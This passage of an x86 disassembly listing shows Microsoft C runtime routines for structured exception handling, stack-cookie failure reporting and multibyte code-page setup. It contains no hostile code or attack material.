loc_4043BA: ; CODE XREF: sub_4042F4+AD�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4043C3: ; CODE XREF: sub_4042F4+C4�j
mov eax, [ebp+var_38]
loc_4043C6: ; CODE XREF: sub_4042F4+1D�j
pop ebx
leave
retn
sub_4042F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043C9 proc near ; DATA XREF: sub_4042F4+26�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
xor ecx, [ebp+arg_4]
call sub_402710
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4043F9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_404463
; ---------------------------------------------------------------------------
jmp short loc_404463
; ---------------------------------------------------------------------------
loc_4043F9: ; CODE XREF: sub_4043C9+1D�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_40BD75
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_404437
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40423C
loc_404437: ; CODE XREF: sub_4043C9+61�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_4042F4
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_404463: ; CODE XREF: sub_4043C9+2C�j
; sub_4043C9+2E�j
pop ebx
leave
retn
sub_4043C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404466 proc near ; CODE XREF: sub_40B915+81�p
; sub_40BA07+1C6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov esi, [edi+0Ch]
mov [ebp+var_4], eax
mov ebx, esi
jmp short loc_4044AA
; ---------------------------------------------------------------------------
loc_40447D: ; CODE XREF: sub_404466+4B�j
cmp esi, 0FFFFFFFFh
jnz short loc_404487
call sub_40BEA5
loc_404487: ; CODE XREF: sub_404466+1A�j
mov ecx, [ebp+var_4]
dec esi
mov eax, esi
imul eax, 14h
add eax, ecx
mov ecx, [ebp+arg_8]
cmp [eax+4], ecx
jge short loc_40449F
cmp ecx, [eax+8]
jle short loc_4044A4
loc_40449F: ; CODE XREF: sub_404466+32�j
cmp esi, 0FFFFFFFFh
jnz short loc_4044AD
loc_4044A4: ; CODE XREF: sub_404466+37�j
dec [ebp+arg_4]
mov ebx, [ebp+arg_0]
loc_4044AA: ; CODE XREF: sub_404466+15�j
mov [ebp+arg_0], esi
loc_4044AD: ; CODE XREF: sub_404466+3C�j
cmp [ebp+arg_4], 0
jge short loc_40447D
mov eax, [ebp+arg_C]
inc esi
mov [eax], esi
mov eax, [ebp+arg_10]
mov [eax], ebx
cmp ebx, [edi+0Ch]
ja short loc_4044C7
cmp esi, ebx
jbe short loc_4044CC
loc_4044C7: ; CODE XREF: sub_404466+5B�j
call sub_40BEA5
loc_4044CC: ; CODE XREF: sub_404466+5F�j
mov eax, esi
imul eax, 14h
add eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_404466 endp
; =============== S U B R O U T I N E =======================================
sub_4044D9 proc near ; CODE XREF: sub_40B4FD+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_40539D
mov eax, [eax+98h]
mov [esi+4], eax
call sub_40539D
mov [eax+98h], esi
mov eax, esi
pop esi
retn
sub_4044D9 endp
; =============== S U B R O U T I N E =======================================
sub_404501 proc near ; CODE XREF: sub_40B623+60�p
arg_0 = dword ptr 4
call sub_40539D
mov eax, [eax+98h]
jmp short loc_404519
; ---------------------------------------------------------------------------
loc_40450E: ; CODE XREF: sub_404501+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_40451F
mov eax, [eax+4]
loc_404519: ; CODE XREF: sub_404501+B�j
test eax, eax
jnz short loc_40450E
inc eax
retn
; ---------------------------------------------------------------------------
loc_40451F: ; CODE XREF: sub_404501+13�j
xor eax, eax
retn
sub_404501 endp
; =============== S U B R O U T I N E =======================================
sub_404522 proc near ; CODE XREF: sub_40B623+9�p
arg_0 = dword ptr 4
push esi
call sub_40539D
mov esi, [esp+4+arg_0]
cmp esi, [eax+98h]
jnz short loc_404544
call sub_40539D
mov ecx, [esi+4]
mov [eax+98h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_404544: ; CODE XREF: sub_404522+10�j
call sub_40539D
mov eax, [eax+98h]
jmp short loc_40455A
; ---------------------------------------------------------------------------
loc_404551: ; CODE XREF: sub_404522+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_404566
mov eax, ecx
loc_40455A: ; CODE XREF: sub_404522+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_404551
pop esi
jmp sub_40BEA5
; ---------------------------------------------------------------------------
loc_404566: ; CODE XREF: sub_404522+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_404522 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40456E proc near ; CODE XREF: sub_40B4FD+7F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
and [ebp+var_18], 0
lea ecx, [ebp+var_18]
xor eax, ecx
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset loc_4042C4
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_40BEF0
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_40456E endp
; =============== S U B R O U T I N E =======================================
sub_4045CC proc near ; CODE XREF: sub_401065+7�p
; sub_40121E+7�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045FF proc near ; CODE XREF: sub_401442+7�p
; sub_40B4B4+7�p
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], esp
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_4045FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404635 proc near ; CODE XREF: sub_40177B+A�p
; sub_4019F3+A�p ...
arg_0 = byte ptr 4
push eax
push large dword ptr fs:0
lea eax, [esp+8+arg_0]
sub esp, [esp+0Ch]
push ebx
push esi
push edi
mov [eax], ebp
mov ebp, eax
mov eax, ds:dword_423064
xor eax, ebp
push eax
mov [ebp-10h], eax
push dword ptr [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
lea eax, [ebp-0Ch]
mov large fs:0, eax
retn
sub_404635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40466B proc near ; CODE XREF: sub_401065+2D�p
; sub_40121E+6B�p ...
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
retn
sub_40466B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40467F proc near ; CODE XREF: sub_40177B:loc_4019EB�p
; sub_4019F3:loc_401C15�p ...
mov ecx, [ebp-10h]
xor ecx, ebp
call sub_402710
jmp sub_40466B
sub_40467F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40468E proc near ; CODE XREF: sub_402710:loc_40271A�j
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 328h
mov ds:dword_425BA8, eax
mov ds:dword_425BA4, ecx
mov ds:dword_425BA0, edx
mov ds:dword_425B9C, ebx
mov ds:dword_425B98, esi
mov ds:dword_425B94, edi
mov ds:word_425BC0, ss
mov ds:word_425BB4, cs
mov ds:word_425B90, ds
mov ds:word_425B8C, es
mov ds:word_425B88, fs
mov ds:word_425B84, gs
pushf
pop ds:dword_425BB8
mov eax, [ebp+0]
mov ds:dword_425BAC, eax
mov eax, [ebp+4]
mov ds:dword_425BB0, eax
lea eax, [ebp+arg_0]
mov ds:dword_425BBC, eax
mov eax, [ebp+var_320]
mov ds:dword_425AF8, 10001h
mov eax, ds:dword_425BB0
mov ds:dword_425AAC, eax
mov ds:dword_425AA0, 0C0000409h
mov ds:dword_425AA4, 1
mov eax, ds:dword_423064
mov [ebp+var_328], eax
mov eax, ds:dword_423068
mov [ebp+var_324], eax
call ds:dword_41D090
mov ds:dword_425AF0, eax
push 1
call sub_407B65
pop ecx
push 0
call ds:dword_41D19C
push offset off_41D3F8
call ds:dword_41D198 ; UnhandledExceptionFilter
cmp ds:dword_425AF0, 0
jnz short loc_40477E
push 1
call sub_407B65
pop ecx
loc_40477E: ; CODE XREF: sub_40468E+E6�j
push 0C0000409h
call ds:dword_41D0CC
push eax
call ds:dword_41D0F8
leave
retn
sub_40468E endp
; =============== S U B R O U T I N E =======================================
sub_404792 proc near ; CODE XREF: sub_404ABE+11E�p
; sub_404ABE+173�p
sub eax, 3A4h
jz short loc_4047BB
sub eax, 4
jz short loc_4047B5
sub eax, 0Dh
jz short loc_4047AF
dec eax
jz short loc_4047A9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4047A9: ; CODE XREF: sub_404792+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_404792+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4047B5: ; CODE XREF: sub_404792+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4047BB: ; CODE XREF: sub_404792+5�j
mov eax, 411h
retn
sub_404792 endp
; =============== S U B R O U T I N E =======================================
sub_4047C1 proc near ; CODE XREF: sub_404ABE+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_407B70
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_423070
add esp, 0Ch
sub eax, esi
loc_4047F4: ; CODE XREF: sub_4047C1+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_4047F4
lea ecx, [esi+11Dh]
mov esi, 100h
loc_404808: ; CODE XREF: sub_4047C1+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_404808
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4047C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_404816 proc near ; CODE XREF: sub_404ABE+141�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call ds:dword_41D1B4
test eax, eax
mov edi, 100h
jz loc_40493C
xor eax, eax
loc_40484F: ; CODE XREF: sub_404816+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_40484F
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_404894
lea ebx, [ebp+49Ch+var_511]
loc_40486C: ; CODE XREF: sub_404816+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_40488C
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_407B70
add esp, 0Ch
loc_40488C: ; CODE XREF: sub_404816+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_40486C
loc_404894: ; CODE XREF: sub_404816+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40C4F4
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40C2F9
add esp, 24h
xor eax, eax
loc_4048FB: ; CODE XREF: sub_404816+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_404913
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_404924
; ---------------------------------------------------------------------------
loc_404913: ; CODE XREF: sub_404816+ED�j
test cl, 2
jz short loc_40492D
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_404924: ; CODE XREF: sub_404816+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_404935
; ---------------------------------------------------------------------------
loc_40492D: ; CODE XREF: sub_404816+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_404935: ; CODE XREF: sub_404816+115�j
inc eax
cmp eax, edi
jb short loc_4048FB
jmp short loc_404989
; ---------------------------------------------------------------------------
loc_40493C: ; CODE XREF: sub_404816+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_40494E: ; CODE XREF: sub_404816+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_40496E
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_40497D
; ---------------------------------------------------------------------------
loc_40496E: ; CODE XREF: sub_404816+14A�j
cmp edx, 19h
ja short loc_404981
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_40497D: ; CODE XREF: sub_404816+156�j
mov [eax], dl
jmp short loc_404984
; ---------------------------------------------------------------------------
loc_404981: ; CODE XREF: sub_404816+15B�j
mov byte ptr [eax], 0
loc_404984: ; CODE XREF: sub_404816+169�j
inc ecx
cmp ecx, edi
jb short loc_40494E
loc_404989: ; CODE XREF: sub_404816+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 49Ch
leave
retn
sub_404816 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049A0 proc near ; CODE XREF: sub_40271F+57�p
; sub_404C69+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421430
call __SEH_prolog4
call sub_40539D
mov edi, eax
mov eax, ds:dword_423594
test [edi+70h], eax
jz short loc_4049DA
cmp dword ptr [edi+6Ch], 0
jz short loc_4049DA
mov esi, [edi+68h]
loc_4049C6: ; CODE XREF: sub_4049A0+96�j
test esi, esi
jnz short loc_4049D2
push 20h
call sub_40785D
pop ecx
loc_4049D2: ; CODE XREF: sub_4049A0+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4049DA: ; CODE XREF: sub_4049A0+1B�j
; sub_4049A0+21�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, ds:off_423498
jz short loc_404A2A
test esi, esi
jz short loc_404A12
push esi
call ds:dword_41D1BC
test eax, eax
jnz short loc_404A12
cmp esi, offset dword_423070
jz short loc_404A12
push esi
call sub_403603
pop ecx
loc_404A12: ; CODE XREF: sub_4049A0+56�j
; sub_4049A0+61�j ...
mov eax, ds:off_423498
mov [edi+68h], eax
mov esi, ds:off_423498
mov [ebp+var_1C], esi
push esi
call ds:dword_41D1B8
loc_404A2A: ; CODE XREF: sub_4049A0+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404A3B
jmp short loc_4049C6
sub_4049A0 endp
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: seg001:00421448�o
mov esi, [ebp-1Ch]
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404A3B proc near ; CODE XREF: sub_4049A0+91�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_404A3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A44 proc near ; CODE XREF: sub_404ABE+19�p
; sub_404C69+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_40271F
cmp esi, 0FFFFFFFEh
mov ds:dword_425DC4, ebx
jnz short loc_404A7F
mov ds:dword_425DC4, 1
call ds:dword_41D188
loc_404A71: ; CODE XREF: sub_404A44+50�j
; sub_404A44+67�j
cmp [ebp+var_4], bl
jz short loc_404ABB
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_404ABB
; ---------------------------------------------------------------------------
loc_404A7F: ; CODE XREF: sub_404A44+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_404A96
mov ds:dword_425DC4, 1
call ds:dword_41D18C
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404A96: ; CODE XREF: sub_404A44+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_404AAD
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov ds:dword_425DC4, 1
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AAD: ; CODE XREF: sub_404A44+55�j
cmp [ebp+var_4], bl
jz short loc_404AB9
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_404AB9: ; CODE XREF: sub_404A44+6C�j
mov eax, esi
loc_404ABB: ; CODE XREF: sub_404A44+30�j
; sub_404A44+39�j
pop ebx
leave
retn
sub_404A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ABE proc near ; CODE XREF: sub_404C69+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_404A44
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_404AF5
loc_404AE7: ; CODE XREF: sub_404ABE+193�j
mov eax, ebx
call sub_4047C1
loc_404AEE: ; CODE XREF: sub_404ABE+146�j
xor eax, eax
jmp loc_404C5A
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_404ABE+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_404AFA: ; CODE XREF: sub_404ABE+4F�j
cmp ds:dword_4234A0[eax], edi
jz short loc_404B69
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_404AFA
lea eax, [ebp+var_18]
push eax
push edi
call ds:dword_41D1B4
test eax, eax
jz loc_404C4B
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_404C3E
cmp [ebp+var_12], 0
jz loc_404C1F
lea esi, [ebp+var_11]
loc_404B53: ; CODE XREF: sub_404ABE+15B�j
mov cl, [esi]
test cl, cl
jz loc_404C1F
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_404C0F
; ---------------------------------------------------------------------------
loc_404B69: ; CODE XREF: sub_404ABE+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_407B70
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_4234B0[ecx]
mov [ebp+var_1C], esi
jmp short loc_404BB9
; ---------------------------------------------------------------------------
loc_404B8F: ; CODE XREF: sub_404ABE+FE�j
mov al, [esi+1]
test al, al
jz short loc_404BBE
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_404BB0
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: sub_404ABE+F4�j
mov eax, [ebp+var_20]
mov al, ds:byte_42349C[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_404BB0: ; CODE XREF: sub_404ABE+DE�j
cmp edi, eax
jbe short loc_404B9E
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_404BB9: ; CODE XREF: sub_404ABE+CF�j
; sub_404ABE+110�j
cmp byte ptr [esi], 0
jnz short loc_404B8F
loc_404BBE: ; CODE XREF: sub_404ABE+D6�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_404BB9
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_404792
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_4234A4[ecx]
pop edx
loc_404BF0: ; CODE XREF: sub_404ABE+13D�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_404BF0
loc_404BFD: ; CODE XREF: sub_404ABE+18B�j
mov esi, ebx
call sub_404816
jmp loc_404AEE
; ---------------------------------------------------------------------------
loc_404C09: ; CODE XREF: sub_404ABE+153�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_404C0F: ; CODE XREF: sub_404ABE+A6�j
cmp eax, ecx
jbe short loc_404C09
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_404B53
loc_404C1F: ; CODE XREF: sub_404ABE+8C�j
; sub_404ABE+99�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_404C27: ; CODE XREF: sub_404ABE+16E�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_404C27
mov eax, [ebx+4]
call sub_404792
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_404C41
; ---------------------------------------------------------------------------
loc_404C3E: ; CODE XREF: sub_404ABE+82�j
mov [ebx+8], esi
loc_404C41: ; CODE XREF: sub_404ABE+17E�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_404BFD
; ---------------------------------------------------------------------------
loc_404C4B: ; CODE XREF: sub_404ABE+5E�j
cmp ds:dword_425DC4, esi
jnz loc_404AE7
or eax, 0FFFFFFFFh
loc_404C5A: ; CODE XREF: sub_404ABE+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_404ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C69 proc near ; CODE XREF: sub_404E03+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00404DD5 SIZE 0000002E BYTES
push 14h
push offset dword_421450
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_40539D
mov edi, eax
mov [ebp+var_24], edi
call sub_4049A0
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_404A44
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_404DF6
push 220h
call sub_40773A
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_404DFA
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_404ABE
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_404DD5
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call ds:dword_41D1BC
test eax, eax
jnz short loc_404CFA
mov eax, [esi+68h]
cmp eax, offset dword_423070
jz short loc_404CFA
push eax
call sub_403603
pop ecx
loc_404CFA: ; CODE XREF: sub_404C69+7E�j
; sub_404C69+88�j
mov [esi+68h], ebx
push ebx
mov edi, ds:dword_41D1B8
call edi
test byte ptr [esi+70h], 2
jnz loc_404DFA
test byte ptr ds:dword_423594, 1
jnz loc_404DFA
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov ds:dword_425DD4, eax
mov eax, [ebx+8]
mov ds:dword_425DD8, eax
mov eax, [ebx+0Ch]
mov ds:dword_425DDC, eax
xor eax, eax
loc_404D43: ; CODE XREF: sub_404C69+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_404D5B
mov cx, [ebx+eax*2+10h]
mov ds:word_425DC8[eax*2], cx
inc eax
jmp short loc_404D43
; ---------------------------------------------------------------------------
loc_404D5B: ; CODE XREF: sub_404C69+E0�j
xor eax, eax
loc_404D5D: ; CODE XREF: sub_404C69+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_404D74
mov cl, [eax+ebx+1Ch]
mov ds:byte_423290[eax], cl
inc eax
jmp short loc_404D5D
; ---------------------------------------------------------------------------
loc_404D74: ; CODE XREF: sub_404C69+FC�j
xor eax, eax
loc_404D76: ; CODE XREF: sub_404C69+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_404D90
mov cl, [eax+ebx+11Dh]
mov ds:byte_423398[eax], cl
inc eax
jmp short loc_404D76
; ---------------------------------------------------------------------------
loc_404D90: ; CODE XREF: sub_404C69+115�j
push ds:off_423498
call ds:dword_41D1BC
test eax, eax
jnz short loc_404DB3
mov eax, ds:off_423498
cmp eax, offset dword_423070
jz short loc_404DB3
push eax
call sub_403603
pop ecx
loc_404DB3: ; CODE XREF: sub_404C69+135�j
; sub_404C69+141�j
mov ds:off_423498, ebx
push ebx
call edi
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404DCA
jmp short loc_404DFA
sub_404C69 endp
; =============== S U B R O U T I N E =======================================
sub_404DCA proc near ; CODE XREF: sub_404C69+15A�p
; DATA XREF: seg001:00421468�o
push 0Dh
call sub_40591F
pop ecx
retn
sub_404DCA endp
; ---------------------------------------------------------------------------
jmp short loc_404DFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404C69
loc_404DD5: ; CODE XREF: sub_404C69+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_404DFA
cmp ebx, offset dword_423070
jz short loc_404DE9
push ebx
call sub_403603
pop ecx
loc_404DE9: ; CODE XREF: sub_404C69+177�j
call sub_4057D3
mov dword ptr [eax], 16h
jmp short loc_404DFA
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404C69+30�j
and [ebp+var_20], 0
loc_404DFA: ; CODE XREF: sub_404C69+45�j
; sub_404C69+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_404C69
; =============== S U B R O U T I N E =======================================
sub_404E03 proc near ; CODE XREF: sub_40AB84+C�p
; sub_40ABE1+D�p ...
cmp ds:dword_434DD4, 0
jnz short loc_404E1E
push 0FFFFFFFDh
call sub_404C69
pop ecx
mov ds:dword_434DD4, 1
loc_404E1E: ; CODE XREF: sub_404E03+7�j
xor eax, eax
retn
sub_404E03 endp
